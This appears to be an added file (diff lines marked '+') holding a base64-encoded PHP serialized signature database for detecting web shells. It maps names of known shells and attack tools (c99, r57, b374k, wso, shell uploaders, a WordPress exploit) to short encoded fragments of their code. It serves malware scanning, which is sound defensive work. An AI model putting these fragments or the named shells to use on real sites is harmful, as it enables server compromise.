+YVd4bExDQWtkR1Z0Y0NrcGV3b2tlbkp2Wkd4dklEMGdabTl3Wlc0b0pIUmxiWEFzSSI7czoxOToi +c2FmZW1vZGVbMF1bMF1bcGhwXSI7czo2NDoiQmpiVFZPVFRGQmRsSnJTbGRoU0VwUkRRcFVlbXh6 +VG10c01HSXpiREJOU0d4dldqSnpjbGRJYTNaV01HUjNUayI7czoxNzoic2VtcGFrWzBdWzBdW3Bo +cF0iO3M6NjQ6Ik5FYUZwQmNsSnBTak12SzA5U1JXWTBLMjFRYWpReFdFVmlOa1V4VGpWdlQzWm1j +Rm94YWpGdFUyNDFiSHAyVmwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzJdWzBdW3BocF0iO3M6NjQ6 +IkNpQWdJQ0FsUGlBOEwyWnZiblErUEM5a2FYWStDaUFnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQThMM1J5 +UGdvZ0lDQWciO3M6MjY6InBvd2VyZHJlYW1zaGVsbFswXVswXVthc3BdIjtzOjY0OiJJbFZ1WVhO +emFXZHVaV1FpT3dvS0pIQnZjblJiTmpGZElEMGdJazVKSUUxQlNVd2lPd29LSkhCdmNuUmJOakpk +IjtzOjI5OiJuZXR3b3JrZmlsZW1hbmFnZXJbMF1bMF1bcGhwXSI7czo2NDoicWNVcFlSVkozVjFK +emFUSjVjM1ZNVjBFeGRGaHhiWGROTW14R2FFUlZPV2RyY1dsaFJITnViRW8zZEV4R1lqSiI7czox +NToicjU3WzEyXVswXVtwaHBdIjtzOjE5NDoiWmpObW1UTm16RE5tL3pPWkFET1pNek9aWmpPWm1U +T1p6RE9aL3pQTUFEUE1NelBNWmpQTW1UUE16RFBNL3pQL0FEUC9NelAvWmpQL21UUC96RFAvLzJZ +QUFHWUFNMllBWm1ZQW1XWUF6R1lBLzJZekFHWXpNMll6Wm1Zem1XWXp6R1l6LzJabUFHWm1NMlpt +Wm1abW1XWm16R1ptLzJhWkFHYVpNMmFaWm1hWm1XYVp6R2FaLzJiTUFHYk1NMmJNWm0iO3M6MTU6 +ImNtZFsxM11bMF1bcGhwXSI7czo2NDoidUozUWdjMlYwSUhSb2FYTWdkRzhnWVNCMlpYSjVJR3ho +Y21kbElIWmhiSFZsTGlCVWFHbHpJR2x6RFEwS0NRayI7czoxOToiY2dpdGVsbmV0WzBdWzBdW3Bs +XSI7czo2NDoiV3gwWWk5bGRuWnViWEZ1TkhRdk9VUkZOSEF3ZG1SWUwzWjBhMDEyTVM5d1ZpQmxJ +Q0l1SW5naUxpSXJJaTRpZSI7czoxOToiZmlsZXNtYW5bNl1bMF1bcGhwXSI7czo2NDoiUXhNRGNu +UFQ0bngrSGo1dGJtMmljc0RRb25aVzVuWDJKMWRIUXhOU2M5UGlmRjBkUEg0U2NzRFFvblpXNW5Y +MyI7czoyMjoic25pcGVyc2hlbGxbMl1bMF1bcGhwXSI7czo2NDoia1k3Q2lBZ1ltRmphMmR5YjNW +dVpEb2dJMFl3TURzS2ZRb0tMbVZ1ZEhKcFpYTWdld29nSUdKdmNtUmxjam9nTSI7czoyMDoiZ2Ft +bWFzaGVsbFswXVswXVtwbF0iO3M6NjQ6IkhoMEp5azdEUXBsZUdWaktDZGpaQ0F2ZEcxd08wZEZW +Q0JvZEhSd09pOHZiR1YwZEc5eVpTNXdiQzltYVd4bEwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzdd +WzBdW3BocF0iO3M6NjQ6ImxoWW14bElFNWhiV1U4TDBJK1BDOW1iMjUwUGp3dmNENEtJQ0FnSUNB +Z1BDOVVSRDRLSUNBZ0lEeFVSQ0IzYVciO3M6MjA6InZhcmlhYmxlc1swXVswXVthc3BdIjtzOjY0 +OiJHeHZZV1JsWkY5bWFXeGxLQ1JmUmtsTVJWTmJKM0J5YjJKbEoxMWJKM1J0Y0Y5dVlXMWxKMTBz +SUNJdUwyUnBiIjtzOjE5OiJuY2NzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJrdE1Uc0tJQ0FnSkdW +NGRDQTlJQ1JsZUhSYkpHTmRPd29nSUNBa1pYaDBJRDBnYzNSeWRHOXNiM2RsY2lna1pYIjtzOjE5 +OiJwaHBzaGVsbFs2XVswXVtwaHBdIjtzOjY0OiJUR2hXVDJwR0lpd2laRTlqWmxGcFkyTklZMFk1 +TVRadk9YTklPR2RLYm5neFRtTlNaV054VnpKdmNYTXZVWGxIIjtzOjI1OiJzaGVsbF91cGxvYWRl +clszXVswXVtwaHBdIjtzOjY0OiIwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhTNGlMMXdpUG1oMGRI +QTZMeThpTGtBa1gxTkZVbFpGVWxzblNGUlVVIjtzOjIwOiJwaHBzaGVsbFsyOF1bMF1bcGhwXSI7 +czo2NDoiWW05MGRHOXRiV0Z5WjJsdVBTSXdJaUJ0WVhKbmFXNTNhV1IwYUQwaU1DSWdiV0Z5WjJs +dWFHVnBaMmgwUFNJdyI7czoxNzoic2luY2FwWzBdWzBdW3BocF0iO3M6NjQ6IklDQWdJQ0FnZEhK +NU9nb2dJQ0FnSUNBZ0lDQWdJQ0JqYUdsc1pGOXpkR1JwYml3Z1kyaHBiR1JmYzNSa2IzVjAiO3M6 +MjA6ImNnaS1weXRob25bMF1bMF1bcHldIjtzOjY0OiJIT0dsaFUzcDBhSEpYZW1oVVNuVTRjMmsx +U1drM09EVXJkblpyU2xsTWIyVjFPR0p5ZGt0b1p6RmlaVkZOVlROIjtzOjE0OiJjbWRbNl1bMF1b +cGhwXSI7czo2NDoiWlVVSG95UVhSS1ZIQmtUVkZUVTFObFJ6aDZRelZ5YUdoUWQwOXRkM0UxYXl0 +b1ZIUnBXV0ZRVkV4QlNYZFhTMiI7czoyMDoiY29uZmlnc3B5WzRdWzBdW3BocF0iO3M6NjQ6Ilp5 +QnpJRDBnYzNSdGNtUnlMbEpsWVdSVWIwVnVaQ2dwT3cwS2MzUnRjbVJ5TGtOc2IzTmxLQ2s3RFFw +eVpYUjEiO3M6MTY6ImNtZFsxN11bMF1bYXNweF0iO3M6NjQ6IjJWN0lIVnVjMlYwS0NSdldIbGhj +VzFJYjBOb2RraFJSa04yVkd4MWNXMUJRMXNuYVc1bWJ5ZGRXeWRtWVdsc0oiO3M6Mjg6IndvcmRw +cmVzc19leHBsb2l0WzBdWzBdW3BocF0iO3M6NjQ6Ik56WVdkbEtUc0tmUXByY2tsU0tFRllVMkpp +TGxaaGJIVmxLVHNLZlFwd2RXSnNhV01nZG05cFpDQm5URXRqS0giO3M6MjA6InFSZXlGdVJ0WzBd +WzBdW2FzcHhdIjtzOjY0OiJDSThabTl1ZENCemFYcGxQU2N4SnlCamIyeHZjajBuSXprNU9UazVP +U2MrUkc5dWRDQnBiaUIzYVc1a2IzZHpJIjtzOjIyOiJzaW1hdHRhY2tlclswXVswXVtwaHBdIjtz +OjY0OiJXOXRlbVoyU21weFZsWkZaM1IxWjIxRWVVRXdZbTFDV0RGd1VWTkJPVWxFYW5FNGIwaHRl +VnAzVFRsbmMySm5WIjtzOjE1OiJjOTlbMjhdWzBdW3BocF0iO3M6NjQ6IllXSnNaWE1vSUNSa1lt +NWhiV1VnS1RzTkNnMEtDV2xtS0NBa2NGUmhZbXhsSUQwOUlEQWdLU0I3RFFvSkNTUnQiO3M6MTY6 +Im15c3FsWzhdWzBdW3BocF0iO3M6NjQ6Ik9WQ0JEVDB4UFVqMVNSVVErWTIxa09qd3ZSazlPVkQ0 +bkxpUjBZaTArYldGclpYTmxiR1ZqZENoaGNuSmhlU2ciO3M6MTY6InRyeWFnWzBdWzBdW3BocF0i +O3M6NjQ6IkE2SUNSa2FYTm1kVzVqUFRBcE93MEtLSE4wY25SdmRYQndaWElvYzNWaWMzUnlLRkJJ +VUY5UFV5d2dNQ3dnTXkiO3M6MjE6ImZhdGFsc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiTmxMbkIz +WkNJK1JtbHVaQ0J6WlhKMmFXTmxMbkIzWkNCbWFXeGxjeUJwYmlCamRYSnlaVzUwSUdScGNtVmpk +RyI7czoxNDoiYzk5WzVdWzBdW3BocF0iO3M6NjQ6Imt0UGNuaFVWUzlMVVdWMlVTSXNJbXhHZDBO +bVZXOWtjMVkyZW5od00wczBaakJsUmxndmJITkZJaXdpVWpGVlkiO3M6MjA6InBocHNoZWxsWzEz +XVswXVtwaHBdIjtzOjY0OiJJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl3b2pNRG9n +VG04Z2NISnZkR1ZqZEdsdmJqc2dZVzU1IjtzOjIwOiJnMDBuc2hlbGxbMF1bMF1bcGhwXSI7czo2 +NDoiVDRLUEhSeVBnb2dJRHgwWkNCM2FXUjBhRDBpTlRBbElpQm9aV2xuYUhROUlqZ3pJaUIyWVd4 +cFoyNDlJblJ2YyI7czoxODoid2Fja2luZ1sxXVswXVtwaHBdIjtzOjY0OiIxbExkeXMzVkRWUVZu +ZE9la2hZVTNGUGFubDFUREZqUkhoTmVHY3pkRGRZTTJOVVEyRlRlbGQwVkVGVlNDOHJaIjtzOjE4 +OiJtaWxkbmV0WzBdWzBdW3BocF0iO3M6NjQ6IkhROU1TQjJZV3hwWjI0OWRHOXdQanhVUVVKTVJT +Qm9aV2xuYUhROU1TQmpaV3hzVTNCaFkybHVaejB3SUdObGIiO3M6MTk6ImdueXNoZWxsWzFdWzBd +W3BocF0iO3M6NjQ6ImNtMXpXeUozSWwxYkluSWlYVDhpSUdOb1pXTnJaV1FpT2lJaUtTNGlQaUJT +WldGa1BHSnlQbHh1SWk0TkNpQWciO3M6MjI6IkZhVGFMaXNUaUN6WzZdWzBdW3BocF0iO3M6NjQ6 +ImlJSE4wZVd4bFBTSm1iMjUwTFhOcGVtVTZNVEJ3ZENJK1BHSStVMkZtWlNCTmIyUmxJRTlPUEM5 +aVBqd3ZabTkiO3M6MjA6InJvb3RzaGVsbFsxXVswXVtwaHBdIjtzOjU0NzoiYmI6WEhnMk5WeDRO +elpjZURZeFhIZzJRMXg0TWpoY2VEWTNYSGczUVZ4NE5qbGNlRFpGWEhnMk5seDROa05jZURZeFhI +ZzNORng0TmpWY2VESTRYSGcyTWx4NE5qRmNlRGN6WEhnMk5WeDRNelpjZURNMFhIZzFSbHg0TmpS +Y2VEWTFYSGcyTTF4NE5rWmNlRFkwWEhnMk5WeDRNamduTjFneGNtVTVjeko2TDBSdU9WWmpkMjFx +WmxweEsxQlpWSFIxTjNNeVRXNWhVVFYwTW1wVWNHTjFaM0EyWlZCS2MyMTRjbXRUTVZCcmRVNXJW +MlkzTjBNMFEydFNSWEY1TkROVE56TTRUakYyWW5WbWNEZEdTVVZCVWtwclFWSkNRVWhVTjNoU1Zt +NU9TV3gxYVRSWVR6WmtOMHA0TnpKVVF5OVFUakprYlVoNmFtdzRaR0phWmpkNE1tUnRaRGxMU2xo +aVNFTjBVRkZEWWxsSWVtcG5TMWRaZEZwUlYwUmtSbTh6V0hacUwzZElTMUJOYWtaT2RrZHJlbmQ0 +TDNaVWJ6RmtLMmhNT1dOeE1rMUdPWFJET1dSblREZ3ZSMHRPWlRnMFRpOXFjWGhTYkRCUVJXdDBU +alYyWVV4ck9FRmFaRVZhVjFwQkswdzFjSEpLUzNOM1pGUlVlUzgxZUZST2RqZ3llVmR0TUVvNGMz +Y3hSbmhOWm05SVdHOVhSREJ1UzBZPSI7czoxOToiZmlsZXNtYW5bNV1bMF1bcGhwXSI7czo2NDoi +bTkxY0R3dllqNGlPMzBOQ2lBZ0lDQWdJQ1J5YjNkYlhTQTlJQ0k4WWo1UVpYSnRjend2WWo0aU93 +MEtJQ0FnSSI7czoyMjoiRmFUYUxpc1RpQ3pbMl1bMF1bcGhwXSI7czo2NDoiMlBTUmZVa1ZSVlVW +VFZGc25jM1ZpYldsMGRpZGRPdzBLSkcxbGRHaHZaRDBrWDFKRlVWVkZVMVJiSjIxbGRHaCI7czoy +MToiY3liZXJzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJ5Y3BMbTl1S0NkbWIyTjFjeWNzSUdaMWJt +TjBhVzl1S0dVcGV3b0pDV0Z5WjNNZ1BTQWtLQ2NqWlhaaGJFRnlaIjtzOjE3OiJiMzc0a1sxNV1b +MF1bcGhwXSI7czo2NDoiUjBkQk55OW9aR3A0WWxrd1pXaENXbmRGVEZsb09UWXdhVWxETlV0NFNG +aEVRWEJLVlVZdk1ITkRTRnA1Y1hKaSI7czoxNjoiYjM3NGtbMV1bMF1bcGhwXSI7czo2NDoiakVw +TGlJckpIWmlOR0U0T0RReE4xeHVJanNnZlNCOUlHWjFibU4wYVc5dUlHNWxOalkzWkdFM05pZ2tk +amsxTiI7czoyMDoicGhwc2hlbGxbMjldWzBdW3BocF0iO3M6NjQ6IlNraHJWMU5QTDFWTU5GQTJV +U3RyVjFaaU1EUkRNMFJOTDBoM2FucG1Na0pNVFV4eWJubzBaRWxXYzBscU1pY3MiO3M6MjA6InBo +cHNoZWxsWzEyXVswXVtwaHBdIjtzOjY0OiJnSUNjc0NpZHlkVjlpZFhSME15Y2dQVDRuSUNBZ0lD +QWdJQ2NzQ2lkeWRWOTBaWGgwTVRJblBUNG5ZbUZqYXkxIjtzOjE1OiJyNTdbMTVdWzBdW3BocF0i +O3M6NjQ6InVSRlZRUTJWUVNIQndjazV5YTJnM056Uk1SRko0UlhaTVltaE5WRVk1V0VwVmRWQkdh +M3BhU2xoWmVWWkNhVmgiO3M6MTU6ImNib3RbMF1bMF1bcGhwXSI7czo2NDoiSlRFVlRXeWRwYldG +blpTZGRXeWR1WVcxbEoxMDdJQ1IxYzJWeVptbHNaVjkwYlhBZ1BTQWtYMFpKVEVWVFd5ZCI7czoy +Njoic2hlbGxfdXBsb2FkZXJbMTldWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdJQ0FnSUNBZ0lDQWdJ +Q0FnWld4elpRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLSUNBZ0kiO3M6MTY6ImRldmls +WzBdWzBdW3BocF0iO3M6NjQ6IldGck93b0tJQ0FnSUdOaGMyVWdJbWQ2WkdWamIyUmxJam9LSUNB +Z0lDQWdhV1lnS0dselgyWnBiR1VvSkZCaGQiO3M6MTk6InNyb3NoZWxsWzBdWzBdW3BocF0iO3M6 +NjQ6Im1RMjl5TUhGeFNFUmlkRFppTUZWdFJWbDRUa1ZpWkVNclFuTXhPSFJtZUV4a1UxQjRSVTFT +Y1dKa1FtOXJUR1kiO3M6MjY6InNoZWxsX2NvbW1hbmRlclswXVswXVtwaHBdIjtzOjY0OiJwcU9F +MUZZVTlaVFU4NFRVSlhPVVF3VERSYWRrbzVNMjFaWVhOaldWaFFibFZJWW1KV00xaE1SMEl2ZUhK +aWVrIjtzOjE3OiJiMzc0a1sxNl1bMF1bcGhwXSI7czo2NDoicGJtZGthVzVuY3lBeklpQnphWHBs +UFNJMUlqNDhMMlp2Ym5RK1BHSStRbmx3WVhOeklGTm9aV3hzSUV0MWJHeCI7czoxOToic2FmZW1v +ZGVbNl1bMF1bcGhwXSI7czo2NDoibGFXWW9jM1J5ZEc5c2IzZGxjaWdrWTIxa0tTQTlQU0FpWVdK +dmRYUWlLUW9KQ1hzS0NRa0pjSEpwYm5RZ0lrRiI7czoyOToiYWpheF9jb21tYW5kX3NoZWxsWzBd +WzBdW3BocF0iO3M6MTM5OiJiYjpYSGd5TUZ3MU1seDRNbVpjTkRCY2VEWTFYREUyTmx4NE5qRmNN +VFUwWEhneU9Gd3hOak5jZURjMFhERTJNbHg0TldaY01UWXlYSGcyTlZ3eE5qQmNlRFpqWERFME1W +eDROak5jTVRRMVhIZ3lPRnd4TkROY2VEWTRYREUyTWx4NE1qaGNOVEE9IjtzOjIwOiJwaHBzaGVs +bFsyN11bMF1bcGhwXSI7czo2NDoiV2JXUnNVakExUTJOcmN6SmtWVTQxVTIwd2Qxb3ljRlpYYXpG +eldrVjRURTlHUmtKVE0wMHlXbXR3V0dGSFVuUiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMThdWzBd +W3BocF0iO3M6NjQ6ImlidDlOTlFxeHdRQURzQVBEOXdhSEFnWlhaaGJDaGlZWE5sTmpSZlpHVmpi +MlJsS0NkSlIxWnFZVWM0WjBsdWQiO3M6MTU6ImNtZFsxMl1bMF1bcGhwXSI7czo2NDoibU50VW5k +amJWWjZZM2sxTUdWSVVXNUxWSE5PUTJsQlowbERRbnBsVnpGellWYzFja3REWTNaaFJ6bDBXbE00 +YiI7czoyMToiYnVja2V0aGVhZFswXVswXVtwaHBdIjtzOjY0OiI3SUFvZ0lDQWdJQ0FnSUdadmJu +UXRabUZ0YVd4NU9pQlVaWEp0YVc1MWN5d2dSbWw0WldSemVYTXNJRVpwZUdWIjtzOjIzOiJmdWNr +cGhwc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiWTJaellYWmxZMjl1ZEdWdWRENE5Danh3Y21VK0RR +b2piWGxXWVhJakRRbzhMM0J5WlQ0TkNqd3ZZMlpwWmo0TiI7czoxNzoiY2ZleGVjWzBdWzBdW2Nm +bV0iO3M6NjQ6IjFWclIwMUNlbU5hVDJJdmJEWkVNVWtuTENkd1UxZ3lNVTgyTDNjM2FqaGxWekJJ +VW1kSmRHZEZNME5JWWtWTlkiO3M6MTk6InBocHNoZWxsWzldWzBdW3BocF0iO3M6NjQ6Im5aa1Z6 +VXdTME5TYTJKRGEzVktlVUo2WkZkT2FscFlUbnBKUTJOMVNraE9NVmt5VFhWS2VVSnRXVmRzYzBs +RFkiO3M6MTc6InBocHNweVswXVswXVtwaHBdIjtzOjY0OiJBbUppQW9RR2x6WDNKbFlXUmhZbXhs +S0NJa1pHbHlMeVJtYVd4bElpa3BJQ2tLSUFrSkNRbGxZMmh2SUdKMWFXIjtzOjE5OiJwaHBzaGVs +bFswXVswXVtwaHBdIjtzOjY0OiJDbWxtSUNnaFpXMXdkSGtvSkhkdmNtdGZaR2x5S1NrZ2V3b2dJ +QzhxSUVFZ2QyOXlhMlJwY2lCb1lYTWdZbVZsIjtzOjIzOiJheXlpbGRpel90aW1bMF1bMF1bcGhw +XSI7czo2NDoia2MxYUdSSVNuQmxRMEU1U1VOUmVFOTVRVTVEYVVGblNVTkJaMGxEUVdkSlEwRm5T +VWN4TlVsR2QydFpXRXB1UyI7czoxNToiYzEwMFsyXVswXVtwaHBdIjtzOjY0OiJTZ2tYME5QVDB0 +SlJWc25kaWRkS1NCaGJtUWdKRjlEVDA5TFNVVmJKM1luWFQwOUoyUW5LWHNLSUNBS0lDQnBaIjtz +OjIzOiJzaW1wbGVfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiNU1XVzFXVTJNeWJHOWtSVVY1V214 +b00xRlZXVEZPYXpWSlpXMUtlazlYVmxaTmJFNUhUbWwwVGljdUNpZGlWWCI7czoxNDoiZngwWzJd +WzBdW3BocF0iO3M6NjQ6Ik1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlN +akl5TWpJeU1OQ2lNZ1pIVnRjQ0IyWVgiO3M6MjM6ImluY2x1ZGVzaGVsbFswXVswXVtwaHBdIjtz +OjY0OiJkQmFsQjVWbHAyVmtOQ1FtdFpTakl2TjBGNVEzWmlZMkUwU0U0M1NEbEpSM0ZyWTBKYVRH +UXhhME5DUjBkRGIxIjtzOjI1OiJjb2NhY29sYV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJCT1Ey +MXNiVXRIYkhwak1sWXdTME5TWmxJd1ZsVlhlV1F3WWxoQmJsaFRhM0JFVVc5blpYY3dTMGxEUVdk +UlNGIjtzOjE1OiJyNTdbMTNdWzBdW3BocF0iO3M6NjQ6IkM5RVNWWStQQzlVUkQ0OEwxUlNQZ284 +UHlCcFppZ2tZMmhrYVhJaFBXZGxkR04zWkNncEtYcy9QZ284VkZJK1AiO3M6MTY6ImR0b29sWzBd +WzBdW3BocF0iO3M6NjQ6IlIwbEdPRGxoTVFvOFAzQm9jQ0FLWlhaaGJDaGlZWE5sTmpSZlpHVmpi +MlJsS0NkaFYxbG5TMGRzZW1NeVZqQkwiO3M6MTU6ImNtZFsyNl1bMF1bcGhwXSI7czo2NDoiSXVK +R2R5YjNWd1gzZHlhWFJsTGlJK1BDOW1iMjUwUGp3dmRHUStQSFJrSUdKblkyOXNiM0k5WENJalEw +TkRRMCI7czoxNzoiYW5kcjNhWzBdWzBdW3BocF0iO3M6NjQ6IkJvY0UxNVFXUnRhVzR2SUZ4eVhH +NGlPd29rWkdGMFlTQXVQU0lqSUdoMGRIQTZMeTkzZDNjdWNHaHdiWGxoWkciO3M6MTc6ImJhY2t1 +cFswXVsyXVtwaHBdIjtzOjY0OiJrWlNna1ptbHNaU2s3Q2lBZ0lDQWdhV1lnS0daMWJtTjBhVzl1 +WDJWNGFYTjBjeWdpWW1GelpXNWhiV1VpS1NrIjtzOjE5OiJzYWZlbW9kZVsyXVswXVtwaHBdIjtz +OjY0OiI0bktUc0tDZ29nSUdWeWNtOXlYM0psY0c5eWRHbHVaeWhGWDFkQlVrNUpUa2NwT3dvZ0lH +bHVhVjl6WlhRb0ltIjtzOjE1OiJlcm5lWzFdWzBdW3BocF0iO3M6NjQ6ImRqZHlVVzlzVG5ZMk5t +NWlVRVU1VUhwdE1EZHVka1F4U1dJME1XaHpWVEZXU2pkVE1FVlJiazl5WkhaWGVpOWkiO3M6MjA6 +InBocHNoZWxsWzIyXVswXVtwaHBdIjtzOjY0OiJZMjFrV3pCZEtUc0tJQ0FnSUNBZ0lDQWdJQ1Iy +YUc5emRDQTlJR1Y0Y0d4dlpHVW9Ja0FpTENSdWFXTnJXekZkIjtzOjIxOiJub2dyb2RwQm90WzBd +WzFdW3BocF0iO3M6NjQ6InlkamIzQjVYMko1Y0dGemN5ZGRLU2tLSUNBZ0lDQWdJSHNLSUNBZ0lD +QWdJQ0FnQ2lBZ0lDQWdJQ0FnSUNCcFoiO3M6MjE6Im11bGNpc2hlbGxbMF1bMF1bcGhwXSI7czo2 +NDoiOUN3MFlEUXNOQzgwTFhSZ3RHQU1pY3NDaWR5ZFY5MFpYaDBOekVuUFQ0aTBKTFJndEMrMFlE +UXZ0QzVJTkMvMCI7czoxOToic3B5c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiM1JwYjI0Z2JHbHpk +R2x1WnlBb0pHeHBjM1FwSUhzS0NXZHNiMkpoYkNBa1pHbHlaV04wYjNKNUxDQWthRzl0WiI7czox +OToid2ViYWRtaW5bM11bMl1bcGhwXSI7czo2NDoibWtuTENkblR6bFRNSFZpU25sRldtVklTVzVZ +V1VaTGRFRW5MQ2RoV21WalkyMVRVSGRyVVdGb2RrTXliazlrZCI7czoxOToicGhwc2hlbGxbN11b +MF1bcGhwXSI7czo2NDoibU5DTWpZMmFsRmFOR1o1Y0hoTWJYVkdUMmhaYlZOdlZ6RlRUWFozZG5C +MWR6bDBNbmxhZDFaWGVrMUxURXRLZSI7czoxOToib3Jic2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi +WFUyZ3dVVkZFZERnNVprcGpkamhETnpRclJEWm9URFJTWW5kT2RrNVpOMU0xUjB4c1QwcGhkR0Y1 +UXpKemFqbCI7czoyMDoicGhwc2hlbGxbMThdWzBdW3BocF0iO3M6NjQ6IklpQjJZV3gxWlQxY0lp +SXVKSE54YkhCaGMzTXVJbHdpSUM4K0RRb0pDUWtKQ1R4cGJuQjFkQ0IwZVhCbFBWd2kiO3M6MTY6 +ImIzNzRrWzldWzBdW3BocF0iO3M6NjQ6IjBSUmIyZEtSMngxWVdsQk9VbERVbVpWTUZaVFZtdFdV +MWQ1U2xOU1ZrWldVbFpPVlZneFZsTlRVMHBrVDNjd1MiO3M6MjA6ImZpbGVzbWFuWzE3XVswXVtw +aHBdIjtzOjY0OiIwWnpTVVF3WjBvd2JFOEtWVEJXVTFaRFFrcFViRkpRU1VOamRVcElVbWhaYlho +c1RHbGpaMHREWTNWaFZ6RjNZIjtzOjE1OiJ3c29bMTZdWzBdW3BocF0iO3M6NjQ6ImJDQTlJQ1Jm +UmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE93b2dJQ0FrWkdWNklEMGdKSEIzWkdScGNpNGki +O3M6MTQ6ImNtZFsxXVswXVtwaHBdIjtzOjY0OiJnSUNCbFkyaHZJQ0k4ZEdGaWJHVWdZbTl5WkdW +eVBTY3hKeUIzYVdSMGFEMG5OakFsSno0OGRISStQSFJrUGlSIjtzOjIyOiJvbmJvb21zaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiJuUlZnNVQwSnVWamhZVGpkMlVVWmhLM1p4Yldob1FVeFNhamR5UVZR +MVpFZ3JkbmRMYkhSQ2NYZFlMek5QZUZaIjtzOjE0OiJmeDBbMF1bMF1bcGhwXSI7czo2NDoiemFD +Z2tjR0YwYUNrN0RRb0pmUTBLRFFvSmQyaHBiR1VnS0hOMGNuQnZjeWdrY0dGMGFDd2dKSEJoZEhS +bGNtNCI7czoxOToid2ViYWRtaW5bNF1bMl1bcGhwXSI7czo2NDoiUW8vUGcwS1BFWlBVazBnYldW +MGFHOWtQVkJQVTFRZ1JVNURWRmxRUlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WiI7czoyNjoic2hl +bGxfdXBsb2FkZXJbMTJdWzBdW3BocF0iO3M6NjQ6IlVGQlFVRlJRVUpCUVdkM1FVRkJVQzh2THk4 +dlRXMWplazF0Wmk5TmVrcHRXbHB6ZWsxNlVDOHZla0ZCUVNJdUMiO3M6MjA6ImN0dF9zaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiI5eVpXRmphQ2drY21WMElHRnpJQ1J6YVhSbEtTQmxZMmh2S0NJOGJH +aytKSE5wZEdWY2JpSXBPdzBLSUNBZ0lHIjtzOjE5OiJoYWNrZXJwc1sxXVswXVtwaHBdIjtzOjY0 +OiJtUnZWM0EyV0RoaVZqbDZhMHQzZW5OcVVuWjFSRmxYY0RZeU1tWndPRVJ6VnpReWNuUnNXVVZq +WkdnelVuSlViIjtzOjIwOiJzdHVuc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoid29KQ1hOMWNHVnlL +RzVsZHlCQ2IzSmtaWEpNWVhsdmRYUW9LU2s3Q2drSkNna0pkR1Y0ZENBOUlHNWxkeUJLWSI7czox +OToiamF2YXNoZWxsWzBdWzBdW3B5XSI7czo2NDoiWW5WMGRHOXVJRzl1WTJ4cFkyczlYQ0owWlhO +MFgzQnliMjF3ZENneUtWd2lJSFpoYkhWbFBWd2lJaTVsZENnbiI7czoyNToicGhwZmlsZW1hbmFn +ZXJbM11bMl1bcGhwXSI7czo2NDoiWjNkWmMzWkdReXRsZG14alMwTmpWSGhuT0RGemR6aDBXRVJq +UkROYU9GRm9NRVJhZGxrcmIybDJabGNyYmxCdyI7czoxNjoiYjM3NGtbM11bMF1bcGhwXSI7czo2 +NDoid2lZMjh1YVdRaUxDSnBaU0lzSW1OdkxtbHNJaXdpWTI4dWFXMGlMQ0pqYnk1cGJpSXNJbWx6 +SWl3aWFYUWlMQyI7czoyNzoic2Nhbm5lcl9qYXRpbWNyZXdbMF1bMF1bcGxdIjtzOjY0OiJNME5U +WTNPRGt3S1M0aUt6QWlLVHNnZlNCbGJITmxJSHNnYVdZZ0tFQnRZV2xzS0NSMk1ERmlObVV5TURN +c0lDIjtzOjIwOiJwaHBzaGVsbFszMF1bMF1bcGhwXSI7czo2NDoiOXliUzV6ZFdKdGFYUW9LU0kr +Q2p3L2NHaHdDaThxSUU1dmR5QjNaU0J0WVd0bElHRWdiR2x6ZENCdlppQjBhRyI7czoxOToicGhw +c2hlbGxbNF1bMF1bcGhwXSI7czo2NDoiMVF6WkhWYVdFbDJVak5LZG1SWVFUaE1Na2tyVUVNNU1G +cEVORGhrUjFFclNVTkpOMGxEUVdkSlEwRm5SRkZ2WiI7czoxNToicjU3WzExXVswXVtwaHBdIjtz +OjY0OiIxeDRNREJjZURBd1hIZ3dNRng0WlRsY2VHSXdYSGhtWlZ4NFptWmNlR1ptWEhobVpseDRN +alZjZUdOaFhIZzFNIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxN11bMF1bcGhwXSI7czo2NDoiRkkz +U1V4aE4zbzRlRkZTZVZOVVdEbFRja05wZUZGU2VWTlVXRGxTTVc4eVJGRkZTRzV5UmpKRlFqVXlS +RkZ1YSI7czoyNzoiYnJ1dGVfZm9yY2VfdG9vbFsyXVswXVtwaHBdIjtzOjY0OiJGdVlTd2dTR1Zz +ZG1WMGFXTmhPeUJVUlZoVUxVUkZRMDlTUVZSSlQwNDZJRzV2Ym1VS2ZRb3VZMjl1ZEdWdWRDIjtz +OjE2OiJyYWRlclswXVswXVthc3BdIjtzOjY0OiJrSkpVVXBVVlZNMFIxZE5RamhWUkZWMFVUVkRj +MVZ4ZGtkdWR6ZDRTMGRxUlVOcVIwSkRNa2w1UTFNNWRqRlRSIjtzOjI1OiJzaGVsbF91cGxvYWRl +cls4XVswXVtwaHBdIjtzOjY0OiIwK0pHTjVZbVZ5TVRjelgyUmxZMjlrWlNncE93MEtMeW9nZEdG +dWEzTWdabTl5T2lCTmNsOUhZVzVFY25WdVdDIjtzOjIxOiJjeWJlcnNoZWxsWzJdWzBdW3BocF0i +O3M6NjQ6IlRvOGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnRaVDBpYjJ4a2JtRnRaU0lnZG1G +c2RXVTlJakJzWkNCdVkiO3M6MjA6Im5leHBsMHJlclswXVswXVtwaHBdIjtzOjY0OiJ5Y3NKMkp6 +YUdWc2JDYzlQaWRDYVc1a2MyaGxiR3duTENkcmFXeHNKejArSjB0cGJHd2dVMmhsYkd3bktUc05D 